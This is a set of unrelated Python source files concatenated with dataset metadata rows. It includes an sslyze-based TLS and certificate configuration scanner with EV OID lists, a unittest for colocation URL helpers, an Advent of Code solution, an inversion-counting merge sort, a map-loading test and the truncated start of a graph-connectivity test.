    "STARTTLS SMTP",
    "SSLv2", "SSLv3", "TLSv1.0", "TLSv1.1", "TLSv1.2", "TLSv1.3",
    "Any Forward Secrecy", "All Forward Secrecy",
    "Any RC4", "All RC4",
    "Any 3DES",
    "Key Type", "Key Length",
    "Signature Algorithm",
    "SHA-1 in Served Chain",
    "SHA-1 in Constructed Chain",
    "Not Before", "Not After",
    "Highest Served Issuer", "Highest Constructed Issuer",
    "Asserts EV", "Trusted for EV",
    "EV Trusted OIDs", "EV Trusted Browsers",
    "Is Symantec Cert", "Symantec Distrust Date",
    "Accepted Ciphers",
    "Errors"
]
# Get the relevant fields out of sslyze's JSON format.
#
# Certificate PEM data must be separately parsed using
# the Python cryptography module.
def run_sslyze(data, environment, options):
    """Scan one host with sslyze and record findings in `data`.

    Chooses a synchronous scanner when running on Lambda (which cannot
    use multiprocessing.Queue) and otherwise honors --sslyze-serial
    (default True). Returns `data`, with errors appended on failure.
    """
    if environment.get("scan_method", "local") == "lambda":
        # Lambda cannot override this: multiprocessing is unavailable.
        sync = True
    else:
        sync = options.get("sslyze_serial", True)

    # Test connectivity and build the appropriate scanner.
    server_info, scanner = init_sslyze(data['hostname'], data['port'], data['starttls_smtp'], options, sync=sync)
    if server_info is None:
        data['errors'].append("Connectivity not established.")
        return data

    runner = scan_serial if sync else scan_parallel
    sslv2, sslv3, tlsv1, tlsv1_1, tlsv1_2, tlsv1_3, certs = runner(scanner, server_info, data, options)

    # Only analyze protocols when every protocol scanner functioned —
    # partial results are very hard to draw conclusions from.
    if all([sslv2, sslv3, tlsv1, tlsv1_1, tlsv1_2, tlsv1_3]):
        analyze_protocols_and_ciphers(data, sslv2, sslv3, tlsv1, tlsv1_1, tlsv1_2, tlsv1_3)

    if certs:
        data['certs'] = analyze_certs(certs)

    return data
def analyze_protocols_and_ciphers(data, sslv2, sslv3, tlsv1, tlsv1_1, tlsv1_2, tlsv1_3):
    """Record protocol support and cipher-suite properties in `data`."""
    scans = [sslv2, sslv3, tlsv1, tlsv1_1, tlsv1_2, tlsv1_3]
    labels = ['sslv2', 'sslv3', 'tlsv1.0', 'tlsv1.1', 'tlsv1.2', 'tlsv1.3']
    data['protocols'] = {
        label: supported_protocol(result)
        for label, result in zip(labels, scans)
    }

    accepted = []
    for result in scans:
        accepted.extend(result.accepted_cipher_list or [])
    data['ciphers'] = [cipher.name for cipher in accepted]

    if not accepted:
        return

    # Heuristics over the accepted cipher suites. Imperfect: RC4
    # advertising can discriminate by client, and DHE/ECDHE may not
    # remain the only forward-secret options for TLS.
    names = [cipher.openssl_name for cipher in accepted]
    forward_secret = [n.startswith("DHE-") or n.startswith("ECDHE-") for n in names]
    data['config']['any_rc4'] = any("RC4" in n for n in names)
    data['config']['all_rc4'] = all("RC4" in n for n in names)
    data['config']['any_dhe'] = any(forward_secret)
    data['config']['all_dhe'] = all(forward_secret)
    data['config']['any_3des'] = any(("3DES" in n) or ("DES-CBC3" in n) for n in names)
def analyze_certs(certs):
    """Extract certificate findings from sslyze's CertificateInfo result.

    Returns a dict covering chain issuers, leaf key type/length and
    signature algorithm, SHA-1 usage, EV assertion/trust status, and
    Symantec distrust status.
    """
    data = {'certs': {}}

    # The served chain is always present; the constructed (verified)
    # chain may be absent if validation failed.
    served_chain = certs.certificate_chain
    constructed_chain = certs.verified_certificate_chain

    highest_served = parse_cert(served_chain[-1])
    issuer = cert_issuer_name(highest_served)
    if issuer:
        data['certs']['served_issuer'] = issuer
    else:
        data['certs']['served_issuer'] = "(None found)"

    if (constructed_chain and (len(constructed_chain) > 0)):
        highest_constructed = parse_cert(constructed_chain[-1])
        issuer = cert_issuer_name(highest_constructed)
        if issuer:
            data['certs']['constructed_issuer'] = issuer
        else:
            data['certs']['constructed_issuer'] = "(None constructed)"

    leaf = parse_cert(served_chain[0])
    leaf_key = leaf.public_key()

    # Key length: RSA/DSA keys expose key_size; EC keys expose it on
    # the curve object.
    if hasattr(leaf_key, "key_size"):
        data['certs']['key_length'] = leaf_key.key_size
    elif hasattr(leaf_key, "curve"):
        data['certs']['key_length'] = leaf_key.curve.key_size
    else:
        data['certs']['key_length'] = None

    if isinstance(leaf_key, rsa.RSAPublicKey):
        leaf_key_type = "RSA"
    elif isinstance(leaf_key, dsa.DSAPublicKey):
        leaf_key_type = "DSA"
    elif isinstance(leaf_key, ec.EllipticCurvePublicKey):
        leaf_key_type = "ECDSA"
    else:
        # BUG FIX: this branch previously read `leaf_key_type == str(...)`
        # (a no-op comparison), leaving leaf_key_type unbound and raising
        # NameError for unrecognized key types.
        leaf_key_type = str(leaf_key.__class__)
    data['certs']['key_type'] = leaf_key_type

    # Signature of the leaf certificate only.
    data['certs']['leaf_signature'] = leaf.signature_hash_algorithm.name

    # Beginning and expiration dates of the leaf certificate.
    data['certs']['not_before'] = leaf.not_valid_before
    data['certs']['not_after'] = leaf.not_valid_after

    any_sha1_served = False
    for cert in served_chain:
        if parse_cert(cert).signature_hash_algorithm.name == "sha1":
            any_sha1_served = True
    data['certs']['any_sha1_served'] = any_sha1_served

    # Constructed-chain SHA-1 is only meaningful if a chain was built.
    if data['certs'].get('constructed_issuer'):
        data['certs']['any_sha1_constructed'] = certs.has_sha1_in_certificate_chain

    # Collect certificate-policy OIDs from the leaf certificate.
    extensions = leaf.extensions
    oids = []
    try:
        ext = extensions.get_extension_for_class(cryptography.x509.extensions.CertificatePolicies)
        for policy in ext.value:
            oids.append(policy.policy_identifier.dotted_string)
    except cryptography.x509.ExtensionNotFound:
        # If not found, just move on.
        pass

    data['certs']['ev'] = {
        'asserted': False,
        'trusted': False,
        'trusted_oids': [],
        'trusted_browsers': []
    }
    for oid in oids:
        # BUG FIX: `asserted` was unconditionally reassigned each
        # iteration, so a later non-EVG OID erased an earlier match.
        # If any OID matches the generic EV guidelines OID, the cert is
        # asserting that it was issued following the EV guidelines.
        if oid == evg_oid:
            data['certs']['ev']['asserted'] = True

        # Check which browsers treat this OID as EV.
        browsers = []
        if oid in mozilla_ev:
            browsers.append("Mozilla")
        if oid in google_ev:
            browsers.append("Google")
        if oid in microsoft_ev:
            browsers.append("Microsoft")
        if oid in apple_ev:
            browsers.append("Apple")

        if len(browsers) > 0:
            data['certs']['ev']['trusted'] = True
            # Log each new OID we observe as marked for EV.
            if oid not in data['certs']['ev']['trusted_oids']:
                data['certs']['ev']['trusted_oids'].append(oid)
            # For all matching browsers, log each new one.
            for browser in browsers:
                if browser not in data['certs']['ev']['trusted_browsers']:
                    data['certs']['ev']['trusted_browsers'].append(browser)

    # Is this cert issued by Symantec (subject to distrust)?
    distrust_timeline = certs.symantec_distrust_timeline
    is_symantec_cert = (distrust_timeline is not None)
    data['certs']['is_symantec_cert'] = is_symantec_cert
    if is_symantec_cert:
        data['certs']['symantec_distrust_date'] = distrust_timeline.name
    else:
        data['certs']['symantec_distrust_date'] = None

    return data['certs']
# Given the cert sub-obj from the sslyze JSON, use
# the cryptography module to parse its PEM contents.
def parse_cert(cert):
    """Parse a sslyze certificate object into a `cryptography` x509 cert.

    `public_bytes(Encoding.PEM)` already yields ASCII PEM bytes, so the
    previous `.decode('ascii').encode('utf-8')` round-trip was a no-op
    and has been removed.
    """
    backend = cryptography.hazmat.backends.openssl.backend
    pem_bytes = cert.public_bytes(Encoding.PEM)
    return cryptography.x509.load_pem_x509_certificate(pem_bytes, backend)
# Given a parsed cert from the cryptography module,
# get the issuer name as best as possible
def cert_issuer_name(parsed):
    """Best-effort issuer name: Common Name first, then OU, else None."""
    preferred_oids = (
        cryptography.x509.oid.NameOID.COMMON_NAME,
        cryptography.x509.oid.NameOID.ORGANIZATIONAL_UNIT_NAME,
    )
    for name_oid in preferred_oids:
        attrs = parsed.issuer.get_attributes_for_oid(name_oid)
        if attrs:
            return attrs[0].value
    return None
# Given CipherSuiteScanResult, whether the protocol is supported
def supported_protocol(result):
    """True when the protocol scan accepted at least one cipher suite."""
    return len(result.accepted_cipher_list) != 0
# SSlyze initialization boilerplate
def init_sslyze(hostname, port, starttls_smtp, options, sync=False):
    """Test connectivity and build a sslyze scanner for one host.

    Returns a (server_info, scanner) pair, or (None, None) when
    connectivity cannot be established.
    """
    # NOTE: deliberately mutates the module-level default so later calls
    # reuse the configured timeout.
    global network_timeout
    network_timeout = int(options.get("network_timeout", network_timeout))

    # Mail servers need the STARTTLS SMTP handshake before TLS begins.
    tls_wrapped_protocol = TlsWrappedProtocolEnum.PLAIN_TLS
    if starttls_smtp:
        tls_wrapped_protocol = TlsWrappedProtocolEnum.STARTTLS_SMTP

    try:
        # logging.debug("\tTesting connectivity with timeout of %is." % network_timeout)
        server_tester = ServerConnectivityTester(hostname=hostname, port=port, tls_wrapped_protocol=tls_wrapped_protocol)
        server_info = server_tester.perform(network_timeout=network_timeout)
    except ServerConnectivityError:
        logging.warning("\tServer connectivity not established during test.")
        return None, None
    except Exception as err:
        # Broad catch on purpose: any unexpected failure is reported and
        # treated as "couldn't connect" rather than crashing the scan.
        utils.notify(err)
        logging.warning("\tUnknown exception when performing server connectivity info.")
        return None, None

    if sync:
        scanner = SynchronousScanner(network_timeout=network_timeout)
    else:
        scanner = ConcurrentScanner(network_timeout=network_timeout)
    return server_info, scanner
# Run each scan in-process, one at a time.
# Takes longer, but no multi-process funny business.
def scan_serial(scanner, server_info, data, options):
    """Run every protocol scan (and optionally the cert scan) in-process.

    Takes longer than scan_parallel, but no multi-process funny business.
    Returns the six protocol results plus the certificate result.
    """
    logging.debug("\tRunning scans in serial.")
    protocol_commands = [
        ("SSLv2", Sslv20ScanCommand),
        ("SSLv3", Sslv30ScanCommand),
        ("TLSv1.0", Tlsv10ScanCommand),
        ("TLSv1.1", Tlsv11ScanCommand),
        ("TLSv1.2", Tlsv12ScanCommand),
        ("TLSv1.3", Tlsv13ScanCommand),
    ]
    protocol_results = []
    for label, command_class in protocol_commands:
        logging.debug("\t\t%s scan." % label)
        protocol_results.append(scanner.run_scan_command(server_info, command_class()))

    certs = None
    if options.get("sslyze_certs", True) is True:
        try:
            logging.debug("\t\tCertificate information scan.")
            certs = scanner.run_scan_command(server_info, CertificateInfoScanCommand())
        # Let generic exceptions bubble up.
        except idna.core.InvalidCodepoint:
            logging.warning(utils.format_last_exception())
            data['errors'].append("Invalid certificate/OCSP for this domain.")
            certs = None

    logging.debug("\tDone scanning.")
    return (*protocol_results, certs)
# Run each scan in parallel, using multi-processing.
# Faster, but can generate many processes.
def scan_parallel(scanner, server_info, data, options):
    """Run all scan commands through sslyze's multiprocess scanner.

    Faster than scan_serial, but can generate many processes. Returns
    the six protocol results plus the certificate result; any of them
    may be None when its scan failed.
    """
    logging.debug("\tRunning scans in parallel.")

    def queue(command):
        # Best-effort queueing: failures are recorded on `data` and the
        # corresponding result simply never arrives from get_results().
        try:
            scanner.queue_scan_command(server_info, command)
        except OSError:
            text = ("OSError - likely too many processes and open files.")
            data['errors'].append(text)
            logging.warning("%s\n%s" % (text, utils.format_last_exception()))
        except Exception:
            text = ("Unknown exception queueing sslyze command.\n%s" % utils.format_last_exception())
            data['errors'].append(text)
            logging.warning(text)

    # Initialize result containers.
    # BUG FIX: the original unpacked 7 names from only 6 values, which
    # raised ValueError before any scanning happened.
    sslv2, sslv3, tlsv1, tlsv1_1, tlsv1_2, tlsv1_3, certs = (None,) * 7

    # Queue them all up.
    queue(Sslv20ScanCommand())
    queue(Sslv30ScanCommand())
    queue(Tlsv10ScanCommand())
    queue(Tlsv11ScanCommand())
    queue(Tlsv12ScanCommand())
    queue(Tlsv13ScanCommand())

    # CONSISTENCY FIX: scan_serial reads the underscored "sslyze_certs"
    # key; this path previously read "sslyze-certs" and therefore never
    # saw the option.
    if options.get("sslyze_certs", True) is True:
        queue(CertificateInfoScanCommand())

    # Reassign results back to predictable places after they're all done.
    was_error = False
    for result in scanner.get_results():
        try:
            if isinstance(result, PluginRaisedExceptionScanResult):
                error = ("Scan command failed: %s" % result.as_text())
                logging.warning(error)
                data['errors'].append(error)
                return None, None, None, None, None, None, None

            command_type = type(result.scan_command)
            if command_type == Sslv20ScanCommand:
                sslv2 = result
            elif command_type == Sslv30ScanCommand:
                sslv3 = result
            elif command_type == Tlsv10ScanCommand:
                tlsv1 = result
            elif command_type == Tlsv11ScanCommand:
                tlsv1_1 = result
            elif command_type == Tlsv12ScanCommand:
                tlsv1_2 = result
            elif command_type == Tlsv13ScanCommand:
                tlsv1_3 = result
            elif command_type == CertificateInfoScanCommand:
                certs = result
            else:
                error = "Couldn't match scan result with command! %s" % result
                logging.warning("\t%s" % error)
                data['errors'].append(error)
                was_error = True
        except Exception:
            was_error = True
            text = ("Exception inside async scanner result processing.\n%s" % utils.format_last_exception())
            data['errors'].append(text)
            logging.warning("\t%s" % text)

    # There was an error during async processing.
    if was_error:
        return None, None, None, None, None, None, None

    logging.debug("\tDone scanning.")
    return sslv2, sslv3, tlsv1, tlsv1_1, tlsv1_2, tlsv1_3, certs
# EV Guidelines OID
evg_oid = "2.23.140.1.1"
# Google source:
# https://cs.chromium.org/chromium/src/net/cert/ev_root_ca_metadata.cc?sq=package:chromium&dr=C
google_ev = [
"1.2.392.200091.100.721.1",
"1.2.616.1.113527.2.5.1.1",
"1.3.159.1.17.1",
"1.3.171.1.1.10.5.2",
"1.3.6.1.4.1.13177.10.1.3.10",
"1.3.6.1.4.1.14370.1.6",
"1.3.6.1.4.1.14777.6.1.1",
"1.3.6.1.4.1.14777.6.1.2",
"1.3.6.1.4.1.17326.10.14.2.1.2",
"1.3.6.1.4.1.17326.10.14.2.2.2",
"1.3.6.1.4.1.17326.10.8.12.1.2",
"1.3.6.1.4.1.17326.10.8.12.2.2",
"1.3.6.1.4.1.22234.2.5.2.3.1",
"1.3.6.1.4.1.23223.1.1.1",
"1.3.6.1.4.1.29836.1.10",
"1.3.6.1.4.1.34697.2.1",
"1.3.6.1.4.1.34697.2.2",
"1.3.6.1.4.1.34697.2.3",
"1.3.6.1.4.1.34697.2.4",
"1.3.6.1.4.1.40869.1.1.22.3",
"1.3.6.1.4.1.4146.1.1",
"1.3.6.1.4.1.4788.2.202.1",
"1.3.6.1.4.1.6334.1.100.1",
"1.3.6.1.4.1.6449.1.2.1.5.1",
"1.3.6.1.4.1.782.1.2.1.8.1",
"1.3.6.1.4.1.7879.13.24.1",
"1.3.6.1.4.1.8024.0.2.100.1.2",
"2.16.156.112554.3",
"2.16.528.1.1003.1.2.7",
"2.16.578.1.26.1.3.3",
"2.16.756.1.83.21.0",
"2.16.756.1.89.1.2.1.1",
"2.16.756.5.14.7.4.8",
"2.16.792.3.0.4.1.1.4",
"2.16.840.1.113733.1.7.23.6",
"2.16.840.1.113733.1.7.48.1",
"2.16.840.1.114028.10.1.2",
"2.16.840.1.114171.500.9",
"2.16.840.1.114404.1.1.2.4.1",
"2.16.840.1.114412.2.1",
"2.16.840.1.114413.1.7.23.3",
"2.16.840.1.114414.1.7.23.3",
"2.16.840.1.114414.1.7.24.3"
]
# Mozilla source:
# https://dxr.mozilla.org/mozilla-central/source/security/certverifier/ExtendedValidation.cpp
mozilla_ev = [
"1.2.156.112559.1.1.6.1",
"1.2.392.200091.100.721.1",
"1.2.616.1.113527.2.5.1.1",
"1.3.159.1.17.1",
"1.3.171.1.1.10.5.2",
"1.3.6.1.4.1.13177.10.1.3.10",
"1.3.6.1.4.1.14370.1.6",
"1.3.6.1.4.1.14777.6.1.1",
"1.3.6.1.4.1.14777.6.1.2",
"1.3.6.1.4.1.17326.10.14.2.1.2",
"1.3.6.1.4.1.17326.10.8.12.1.2",
"1.3.6.1.4.1.22234.2.14.3.11",
"1.3.6.1.4.1.22234.2.5.2.3.1",
"1.3.6.1.4.1.22234.3.5.3.1",
"1.3.6.1.4.1.22234.3.5.3.2",
"1.3.6.1.4.1.34697.2.1",
"1.3.6.1.4.1.34697.2.2",
"1.3.6.1.4.1.34697.2.3",
"1.3.6.1.4.1.34697.2.4",
"1.3.6.1.4.1.40869.1.1.22.3",
"1.3.6.1.4.1.4146.1.1",
"1.3.6.1.4.1.4788.2.202.1",
"1.3.6.1.4.1.6334.1.100.1",
"1.3.6.1.4.1.6449.1.2.1.5.1",
"1.3.6.1.4.1.782.1.2.1.8.1",
"1.3.6.1.4.1.7879.13.24.1",
"1.3.6.1.4.1.8024.0.2.100.1.2",
"2.16.156.112554.3",
"2.16.528.1.1003.1.2.7",
"2.16.578.1.26.1.3.3",
"2.16.756.1.89.1.2.1.1",
"2.16.756.5.14.7.4.8",
"2.16.792.3.0.4.1.1.4",
"2.16.840.1.113733.1.7.23.6",
"2.16.840.1.113733.1.7.48.1",
"2.16.840.1.114028.10.1.2",
"2.16.840.1.114404.1.1.2.4.1",
"2.16.840.1.114412.2.1",
"2.16.840.1.114413.1.7.23.3",
"2.16.840.1.114414.1.7.23.3"
]
# Microsoft source:
# https://github.com/PeculiarVentures/tl-create
# Filtered to --microsoft with --for of SERVER_AUTH.
microsoft_ev = [
"0.4.0.2042.1.4",
"0.4.0.2042.1.5",
"1.2.156.112559.1.1.6.1",
"1.2.156.112559.1.1.7.1",
"1.2.156.112570.1.1.3",
"1.2.392.200091.100.721.1",
"1.2.40.0.17.1.22",
"1.2.616.1.113527.2.5.1.1",
"1.2.616.1.113527.2.5.1.7",
"1.3.159.1.17.1",
"1.3.171.1.1.1.10.5",
"1.3.171.1.1.10.5.2",
"1.3.6.1.4.1.13177.10.1.3.10",
"1.3.6.1.4.1.14370.1.6",
"1.3.6.1.4.1.14777.6.1.1",
"1.3.6.1.4.1.14777.6.1.2",
"1.3.6.1.4.1.15096.1.3.1.51.2",
"1.3.6.1.4.1.15096.1.3.1.51.4",
"1.3.6.1.4.1.17326.10.14.2.1.2",
"1.3.6.1.4.1.17326.10.16.3.6.1.3.2.1",
"1.3.6.1.4.1.17326.10.16.3.6.1.3.2.2",
"1.3.6.1.4.1.17326.10.8.12.1.1",
"1.3.6.1.4.1.17326.10.8.12.1.2",
"1.3.6.1.4.1.18332.55.1.1.2.12",
"1.3.6.1.4.1.18332.55.1.1.2.22",
"1.3.6.1.4.1.22234.2.14.3.11",
"1.3.6.1.4.1.22234.2.5.2.3.1",
"1.3.6.1.4.1.22234.3.5.3.1",
"1.3.6.1.4.1.22234.3.5.3.2",
"1.3.6.1.4.1.23223.1.1.1",
"1.3.6.1.4.1.29836.1.10",
"1.3.6.1.4.1.311.94.1.1",
"1.3.6.1.4.1.34697.2.1",
"1.3.6.1.4.1.34697.2.2",
"1.3.6.1.4.1.34697.2.3",
"1.3.6.1.4.1.34697.2.4",
"1.3.6.1.4.1.36305.2",
"1.3.6.1.4.1.38064.1.1.1.0",
"1.3.6.1.4.1.40869.1.1.22.3",
"1.3.6.1.4.1.4146.1.1",
"1.3.6.1.4.1.4146.1.2",
"1.3.6.1.4.1.4788.2.202.1",
"1.3.6.1.4.1.6334.1.100.1",
"1.3.6.1.4.1.6449.1.2.1.5.1",
"1.3.6.1.4.1.782.1.2.1.8.1",
"1.3.6.1.4.1.7879.13.24.1",
"1.3.6.1.4.1.8024.0.2.100.1.2",
"2.16.156.112554.3",
"2.16.528.1.1003.1.2.7",
"2.16.578.1.26.1.3.3",
"2.16.756.1.17.3.22.32",
"2.16.756.1.17.3.22.34",
"2.16.756.1.83.21.0",
"2.16.756.1.89.1.2.1.1",
"2.16.792.3.0.4.1.1.4",
"2.16.840.1.113733.1.7.23.6",
"2.16.840.1.113733.1.7.48.1",
"2.16.840.1.113839.0.6.9",
"2.16.840.1.114028.10.1.2",
"2.16.840.1.114404.1.1.2.4.1",
"2.16.840.1.114412.2.1",
"2.16.840.1.114413.1.7.23.3",
"2.16.840.1.114414.1.7.23.3",
"2.16.840.1.114414.1.7.24.2",
"2.16.840.1.114414.1.7.24.3"
]
# Apple source:
# https://github.com/PeculiarVentures/tl-create
# Filtered to --apple with a --for of SERVER_AUTH.
apple_ev = [
"1.2.250.1.177.1.18.2.2",
"1.2.392.200091.100.721.1",
"1.2.616.1.113527.2.5.1.1",
"1.3.159.1.17.1",
"1.3.6.1.4.1.13177.10.1.3.10",
"1.3.6.1.4.1.14370.1.6",
"1.3.6.1.4.1.14777.6.1.1",
"1.3.6.1.4.1.14777.6.1.2",
"1.3.6.1.4.1.17326.10.14.2.1.2",
"1.3.6.1.4.1.17326.10.8.12.1.2",
"1.3.6.1.4.1.18332.55.1.1.2.22",
"1.3.6.1.4.1.22234.2.14.3.11",
"1.3.6.1.4.1.22234.2.5.2.3.1",
"1.3.6.1.4.1.22234.3.5.3.1",
"1.3.6.1.4.1.23223.1.1.1",
"1.3.6.1.4.1.23223.2",
"1.3.6.1.4.1.34697.2.1",
"1.3.6.1.4.1.34697.2.2",
"1.3.6.1.4.1.34697.2.3",
"1.3.6.1.4.1.34697.2.4",
"1.3.6.1.4.1.40869.1.1.22.3",
"1.3.6.1.4.1.4146.1.1",
"1.3.6.1.4.1.4788.2.202.1",
"1.3.6.1.4.1.6334.1.100.1",
"1.3.6.1.4.1.6449.1.2.1.5.1",
"1.3.6.1.4.1.782.1.2.1.8.1",
"1.3.6.1.4.1.7879.13.24.1",
"1.3.6.1.4.1.8024.0.2.100.1.2",
"2.16.156.112554.3",
"2.16.528.1.1003.1.2.7",
"2.16.578.1.26.1.3.3",
"2.16.756.1.83.21.0",
"2.16.756.1.89.1.2.1.1",
"2.16.756.5.14.7.4.8",
"2.16.792.3.0.4.1.1.4",
"2.16.840.1.113733.1.7.23.6",
"2.16.840.1.113733.1.7.48.1",
"2.16.840.1.114028.10.1.2",
"2.16.840.1.114404.1.1.2.4.1",
"2.16.840.1.114412.1.3.0.2",
"2.16.840.1.114412.2.1",
"2.16.840.1.114413.1.7.23.3",
"2.16.840.1.114414.1.7.23.3",
"2.16.840.1.114414.1.7.24.3"
]
| 34.399541 | 168 | 0.614078 |
a616edbc6cebd82c266401bbcc52ed0148fe6993 | 851 | py | Python | test_colocation.py | joshzyj/pull_facebook_data_for_good | 082170b1ab3e9be26e5b8b706552e3cd8c324071 | [
"MIT"
] | null | null | null | test_colocation.py | joshzyj/pull_facebook_data_for_good | 082170b1ab3e9be26e5b8b706552e3cd8c324071 | [
"MIT"
] | null | null | null | test_colocation.py | joshzyj/pull_facebook_data_for_good | 082170b1ab3e9be26e5b8b706552e3cd8c324071 | [
"MIT"
] | 1 | 2020-04-30T20:43:13.000Z | 2020-04-30T20:43:13.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 5 11:11:56 2020
@author: hamishgibbs
"""
import unittest
import datetime
from colocation import get_file_dates, combine_url, get_urls
class TestColocation(unittest.TestCase):
    """Unit tests for the colocation URL/date helper functions."""

    def setUp(self):
        # Fixed reference timestamp shared by every test.
        self.date1 = datetime.datetime(2020, 1, 1, 8)

    def test_get_file_dates(self):
        dates = get_file_dates(self.date1)
        self.assertIsInstance(dates, list)
        self.assertIsInstance(dates[0], datetime.datetime)

    def test_combine_url(self):
        self.assertIsInstance(combine_url(self.date1, 'url'), str)

    def test_get_urls(self):
        urls = get_urls('url', get_file_dates(self.date1))
        self.assertIsInstance(urls, list)
        self.assertIsInstance(urls[0], str)
648604bfa64bd5361db430909ba246a496fe2393 | 1,203 | py | Python | 2017/python/day2.py | majormunky/advent_of_code | 4cccd7f3879e28e465bbc39176659bdd52bd70d6 | [
"MIT"
] | null | null | null | 2017/python/day2.py | majormunky/advent_of_code | 4cccd7f3879e28e465bbc39176659bdd52bd70d6 | [
"MIT"
] | null | null | null | 2017/python/day2.py | majormunky/advent_of_code | 4cccd7f3879e28e465bbc39176659bdd52bd70d6 | [
"MIT"
] | 1 | 2020-12-04T06:12:01.000Z | 2020-12-04T06:12:01.000Z | import sys
import common
def get_filename():
    """Base name of the running script, without directories or extension."""
    script_name = sys.argv[0].split("/")[-1]
    return script_name.split(".")[0]
data = common.get_file_contents("data/{}_input.txt".format(get_filename()))
def get_parts(line):
    """Parse a whitespace-separated line of integers into a list.

    Generalized from split(" ") plus empty-string filtering: str.split()
    with no argument collapses runs of spaces identically and also
    tolerates tabs, while producing the same result for the
    space-separated puzzle input.
    """
    return [int(token) for token in line.split()]
def part1():
    """Checksum: sum of (max - min) over each spreadsheet row."""
    answer = 0
    for line in data:
        line_parts = get_parts(line)
        # BUG FIX: min(*line_parts) / max(*line_parts) raise TypeError on
        # single-element rows (min(5) is not valid); pass the list itself.
        answer += max(line_parts) - min(line_parts)
    return answer
def part2():
    """Sum, per row, of the quotient of the one evenly-divisible pair."""
    total = 0
    for line in data:
        values = get_parts(line)
        line_answer = 0
        # Try every ordered pair; the puzzle guarantees exactly one
        # evenly-divisible pair per row.
        for numerator in values:
            for denominator in values:
                if numerator == denominator:
                    continue
                if numerator % denominator == 0:
                    line_answer = int(numerator / denominator)
        total += line_answer
    return total
def main():
    """Compute and print both puzzle answers."""
    answer_one = part1()
    answer_two = part2()
    print(f"Part 1: {answer_one}")
    print(f"Part 2: {answer_two}")
if __name__ == '__main__':
main()
| 19.721311 | 75 | 0.546966 |
ce0f870c092ccb68b4ed103d1a0693feed1a1db7 | 1,230 | py | Python | Algorithms/other/counting_inversions.py | philipandreadis/Algorithms-Collection-Python | 5109ccaf3ec09031d7e1f135e3492d8180026b43 | [
"MIT"
] | 86 | 2020-09-23T15:46:12.000Z | 2022-03-20T16:35:52.000Z | Algorithms/other/counting_inversions.py | dineshssdn-867/Algorithms-Collection-Python | 266e5608b0c3558c3738ab749e27329010cd9fd6 | [
"MIT"
] | 3 | 2020-03-29T14:32:00.000Z | 2020-08-27T21:50:28.000Z | Algorithms/other/counting_inversions.py | dineshssdn-867/Algorithms-Collection-Python | 266e5608b0c3558c3738ab749e27329010cd9fd6 | [
"MIT"
] | 40 | 2020-09-22T18:57:57.000Z | 2022-03-30T20:04:15.000Z | def merge_sort(array):
total_inversions = 0
if len(array) <= 1:
return (array, 0)
midpoint = int(len(array) / 2)
(left, left_inversions) = merge_sort(array[:midpoint])
(right, right_inversions) = merge_sort(array[midpoint:])
(merged_array, merge_inversions) = merge_and_count(left, right)
return (merged_array, left_inversions + right_inversions + merge_inversions)
def merge_and_count(left, right):
count_inversions = 0
result = []
left_pointer = right_pointer = 0
left_len = len(left)
right_len = len(right)
while left_pointer < len(left) and right_pointer < len(right):
if left[left_pointer] <= right[right_pointer]:
result.append(left[left_pointer])
left_pointer += 1
elif right[right_pointer] < left[left_pointer]:
count_inversions += left_len - left_pointer
result.append(right[right_pointer])
right_pointer += 1
result.extend(left[left_pointer:])
result.extend(right[right_pointer:])
return (result, count_inversions)
if __name__ == "__main__":
array = [9, 2, 1, 5, 2, 3, 5, 1, 2, 32, 12, 11]
print(array)
result = merge_sort(array)
print(result)
| 27.954545 | 80 | 0.64878 |
16a1caa494883f4f59810c7b3ade41902ec5da96 | 1,413 | py | Python | test_paralleldomain/model/map/test_map.py | parallel-domain/pd-sdk | 20e3d052a5cb612a2dd84bda7b1b5487a6a60edc | [
"Apache-2.0"
] | 10 | 2021-11-17T17:23:49.000Z | 2022-03-18T09:51:23.000Z | test_paralleldomain/model/map/test_map.py | parallel-domain/pd-sdk | 20e3d052a5cb612a2dd84bda7b1b5487a6a60edc | [
"Apache-2.0"
] | 3 | 2021-12-02T17:16:20.000Z | 2022-01-07T12:47:13.000Z | test_paralleldomain/model/map/test_map.py | parallel-domain/pd-sdk | 20e3d052a5cb612a2dd84bda7b1b5487a6a60edc | [
"Apache-2.0"
] | 2 | 2022-03-09T07:03:54.000Z | 2022-03-23T15:53:48.000Z | import os
import pytest
from paralleldomain.decoding.helper import decode_dataset
from paralleldomain.utilities.any_path import AnyPath
from test_paralleldomain.decoding.constants import DGP_V1_DATASET_PATH_ENV, UMD_FILE_PATH_ENV
@pytest.fixture
def umd_path() -> str:
    """Path to the UMD map file, or skip when the env var is unset."""
    value = os.environ.get(UMD_FILE_PATH_ENV)
    if value is None:
        pytest.skip()
    return value
@pytest.fixture
def umd_dataset_path() -> str:
    """Path to the DGP v1 dataset, or skip when the env var is unset."""
    value = os.environ.get(DGP_V1_DATASET_PATH_ENV)
    if value is None:
        pytest.skip()
    return value
def test_load_map(umd_path: str, umd_dataset_path: str):
    """Smoke test: decoding a DGP v1 dataset with a UMD map attached
    yields a non-empty map for the scene."""
    # Attach the UMD map file to scene_000000 while decoding.
    dataset = decode_dataset(
        dataset_path=umd_dataset_path,
        dataset_format="dgpv1",
        umd_file_paths={"scene_000000": AnyPath(umd_path)},
    )
    scene = dataset.get_scene(scene_name="scene_000000")
    map = scene.map
    # Every feature collection should be present and non-empty.
    assert map is not None
    assert map.lane_segments is not None
    assert len(map.lane_segments) > 0
    assert map.junctions is not None
    assert len(map.junctions) > 0
    assert map.road_segments is not None
    assert len(map.road_segments) > 0
    assert map.areas is not None
    assert len(map.areas) > 0
    # Random-walk traversal helpers should yield non-empty paths from an
    # arbitrary lane segment.
    segment = list(map.lane_segments.values())[0]
    assert len(map.get_lane_segment_predecessors_random_path(lane_segment=segment, steps=5)) > 0
    assert len(map.get_lane_segment_successors_random_path(lane_segment=segment, steps=5)) > 0
| 31.4 | 96 | 0.743808 |
9e12c8a162939697444fb8855e0520b5de23847a | 995 | py | Python | tests/model/test_graph_connectivity_dfs.py | unitatem/jira-pert | a95b5d2a9a154d70e464689837559430860173ac | [
"MIT"
] | null | null | null | tests/model/test_graph_connectivity_dfs.py | unitatem/jira-pert | a95b5d2a9a154d70e464689837559430860173ac | [
"MIT"
] | null | null | null | tests/model/test_graph_connectivity_dfs.py | unitatem/jira-pert | a95b5d2a9a154d70e464689837559430860173ac | [
"MIT"
] | null | null | null | import unittest
from jira_pert.model.graph_connectivity_dfs import GraphConnectivityDFS
from jira_pert.model.pert_graph import PertGraph
class MyTestCase(unittest.TestCase):
